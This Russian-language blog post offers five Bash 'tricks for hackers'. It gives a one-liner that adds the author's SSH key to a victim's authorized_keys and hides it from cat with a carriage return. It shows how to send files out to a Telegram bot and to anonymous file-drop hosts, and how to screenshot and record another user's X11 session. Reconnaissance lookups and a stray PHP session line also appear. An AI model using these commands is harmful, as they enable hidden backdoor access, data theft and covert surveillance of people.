use on php tage session_name("laravel_session"); session_start(); $_SESSION['laravel_session'] = '60496c0795af2c5a1851100f52f34ccf3c692279+SFqbxMoR1OsEMJsYnZ11ANbTYFp8HmihXoDEaD6O';

Пять трюков на Bash для хакеров

Пять трюков на Bash для хакеров

Я собрал подборку интересных трюков на bash, которые использую в повседневной деятельности. Предлагаю с ней ознакомиться

1. Скрытие публичного SSH ключа от утилиты cat
Эта команда добавит мой публичный SSH ключ в начало вашего файла ~/.ssh/authorized_keys, но сделает это так, что при просмотре содержимого файла с помощью утилиты cat мой ключ не будет отображаться (это также будет работать по отношению к tac, tail и head)

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELcxK2zmVGlbNppxmG6MJJH3rbMl1q6XbQQiR8ZgBCK x@y"$'\r'"$(<~/.ssh/authorized_keys)" >~/.ssh/authorized_keys

После выполнения этой команды файл ~/.ssh/authorized_keys будет содержать новый публичный SSH ключ, за которым сразу следует символ возврата каретки и старое содержимое файла

Если просматривать файл с помощью утилиты cat, то символ возврата каретки (\r) заставит курсор вернуться в начало строки и перезаписать её. Визуально это приведет к тому, что вы увидите только старое содержимое файла, а мой новый ключ не будет виден

Но не стоит паниковать. Этот метод не так идеален, чтобы его стоило бояться. Полное содержимое файла всё также можно посмотреть с помощью текстовых редакторов (vim, emacs, nano, etc), xxd или strings

2. Просмотр PTR записей (reverse dns) из командной строки
Команда отдаст список доменов для соответствующего IP адреса, если такие конечно же есть. Этот трюк может быть полезен при разведке

Перед выполнением команды задайте переменную IP

IP=<IP адрес>
curl -fsSL "https://lookup.segfault.net/api/v1/download?ip_address=$IP&limit=10&apex_domain=${2}" | column -t -s,

Также для удобства можно воспользоваться функцией представленной ниже и в дальнейшем делать rdns $IP вместо длинной команды

rdns () {
     curl -fsSL "https://lookup.segfault.net/api/v1/download?ip_address=${1:?}&limit=10&apex_domain=${2}" | column -t -s,; 
}
rdns $IP

3. Поиск поддоменов на основе выписанных ранее сертификатов
Для этого воспользуемся сервисом crt.sh, который может отдавать нужную нам информацию в формате JSON. Достанем из вывода значения по ключу common_name с помощью jq и уберём повторяющиеся строки

DOMAIN=google.com
curl -s "https://crt.sh/?q=$DOMAIN&output=json" --compressed -H 'User-Agent: Mozilla/5.0'| jq -r '.[].common_name,.[].name_value' | sort -u

4. Эксфильтрация файлов в Telegram
Интересный трюк с загрузкой файла в Telegram чат с помощью консольного HTTP клиента curl

curl -sF [email protected] "https://api.telegram.org/bot<Токен бота>/sendDocument?chat_id=<ID чата>"

Чтобы получить ID чата в тг можно воспользоваться этой инструкцией или просто включить показ ID в телеграме (у меня этот тумблер находится по маршруту General Settings -> Show Peer IDs in Profile)

Также представляю ещё несколько вариантов в качестве альтернативы этому методу эксфильтрации (автор поста не несёт никакой ответственности за надёжность этих сервисов)

curl -T data.zip https://transfer.sh
curl -F reqtype=fileupload -F time=72h -F '[email protected]' https://litterbox.catbox.moe/resources/internals/api.php
curl -T data.zip https://oshi.at

5. Слежка за пользователем с активной сессией Xorg
При проведении тестов на информационную безопасность иногда возникает необходимость отслеживать действия пользователя с активной сессией X11. Таким образом, нередко можно получить доступ к чувствительным данным

Проверка запущенных графических сессий у пользователей

who -a | grep -E '(:[0-9]+|X)

Снимок экрана

xwd -root -display :0 | convert - jpg:screenshot.jp

Запись экрана (чтобы остановить запись нажмите q)

ffmpeg -f x11grab -s $(xdpyinfo | grep dimensions | awk '{print $2}') -i :0.0 -r 25 -codec:v libx264 -preset ultrafast -pix_fmt yuv420p screen_recording.mp4

Вывод: С помощью хитрых трюков в оболочке командной строки bash можно значительно повысить свою эффективность в обычном администрировании или проведении тестов наступательной информационной безопасности

Disclaimer: Автор сайта не несёт ответственность за неправомерные действия, совершенные на основе изложенного контента

Также этот пост можно посмотреть в телеграм канале Unauth Papaya по ссылке